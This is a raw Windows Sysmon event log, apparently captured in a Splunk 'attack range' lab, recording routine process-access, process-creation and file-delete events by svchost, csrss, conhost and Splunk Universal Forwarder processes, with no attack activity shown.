11:25:46.649{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222926Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:46.649{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222925Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:46.649{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-19BA-6216-5005-000000003902}696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222924Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:46.649{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222923Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:46.649{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222922Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:46.649{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222921Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:46.649{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222920Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:46.649{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222919Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:46.649{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-19BA-6216-5005-000000003902}696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222918Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:46.649{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-19BA-6216-5005-000000003902}696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222917Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:46.650{4F8D34B0-19BA-6216-5005-000000003902}696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222916Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:46.587{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36EACCDC3A74FFB936207CB4A378646E,SHA256=CDB940F889673210AF02B51EC481DA8CAFF27AC406E048985DE0E51B8EFFD9A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299079Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:46.512{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B144D94F59FFA4E8A32ECA29BF4AB8BD,SHA256=FD88F50019BBEDB27624FD7E591787936B3FCDAF86D855B41CB1C21DCDF5CDA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222946Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:47.978{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D443B51BBA115316171E1923998217D4,SHA256=B00ECC4D3DF63F6C6C89EF262C30913B0AE6944881297A288453CD83A6C685A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222945Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:47.978{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44E62A612302A0CE23FE8FDEE6C38E96,SHA256=32F91C355BBCF9007966CF5BE81FB3E72D743D385DF624520718CAD6C42B673F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299080Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:47.527{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D1CAEEED626EC0F8DA7FB575B8303A4,SHA256=9D4A83AB1AEE9C265AE825C6E39D191D81F54E79E866492AB61FAAC0CCCF9CEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222944Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:47.321{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-19BB-6216-5105-000000003902}1952C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222943Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:47.321{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222942Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:47.321{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222941Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:47.321{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222940Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:47.321{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222939Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:47.321{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222938Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:47.321{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222937Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:47.321{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222936Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:47.321{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222935Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:47.321{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222934Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:47.321{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-19BB-6216-5105-000000003902}1952C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222933Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:47.321{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-19BB-6216-5105-000000003902}1952C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222932Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:47.322{4F8D34B0-19BB-6216-5105-000000003902}1952C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 